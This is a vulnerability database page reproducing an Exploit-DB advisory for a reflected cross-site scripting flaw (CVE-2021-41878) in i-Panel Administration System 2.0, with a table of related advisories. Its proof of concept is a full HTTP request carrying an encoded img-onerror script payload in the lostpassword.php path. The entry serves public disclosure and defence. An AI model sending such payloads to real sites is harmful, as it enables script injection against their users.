Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

i-Panel Administration System 2.0 Cross Site Scripting

šŸ—“ļøĀ 15 Oct 2021Ā 00:00:00Reported byĀ Forster ChiuTypeĀ 
packetstorm
Ā packetstormšŸ”—Ā packetstormsecurity.comšŸ‘Ā 599Ā Views

i-Panel Administration System 2.0 XSS Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		i-Panel Administration System 2.0 - Reflected Cross-site Scripting Vulnerability
13 Oct 202100:00
ā€“zdt
IBM Security Bulletins		Security Bulletin:IBM TRIRIGA Application Platform discloses possible path command execution(CVE-2021-41878)
27 Sep 202219:11
ā€“ibm
Circl		CVE-2021-41878
4 Oct 202116:23
ā€“circl
CNNVD		i-Panel Administration System č·Øē«™č„šęœ¬ę¼ę“ž
4 Oct 202100:00
ā€“cnnvd
CVE		CVE-2021-41878
4 Oct 202111:58
ā€“cve
Cvelist		CVE-2021-41878
4 Oct 202111:58
ā€“cvelist
Exploit DB		i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)
15 Oct 202100:00
ā€“exploitdb
Hacker One		U.S. Dept Of Defense: XSS on ( ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆ.gov ) Via URL path
8 Jan 202306:35
ā€“hackerone
Nuclei		i-Panel Administration System 2.0 - Cross-Site Scripting
6 Jun 202603:01
ā€“nuclei
NVD		CVE-2021-41878
4 Oct 202112:15
ā€“nvd
Rows per page
`# Exploit Title: i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)  
# Date: 04.10.2021  
# Exploit Author: Forster Chiu  
# Vendor Homepage: https://www.hkurl.com  
# Version: 2.0  
# Tested on: Chrome, Edge and Firefox  
# CVE: CVE-2021-41878  
# Reference: https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html  
  
As a proof of concept, an alert box can be generated with the following payload.  
Exploit PoC:  
  
GET /lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22XSSVulnerable%22)%3E HTTP/1.1  
Host: Forster  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Cookie: PHPSESSID=7db442d0ed0f9c8e21f5151c3711973e  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept-Language: en-gb  
Accept-Encoding: gzip, deflate  
Connection: close  
`

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Oct 2021 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.15012
exploitreflected cross-site scriptingi-panel administration system 2.0cve-2021-41878proof of conceptvulnerabilityweb securityalert box
599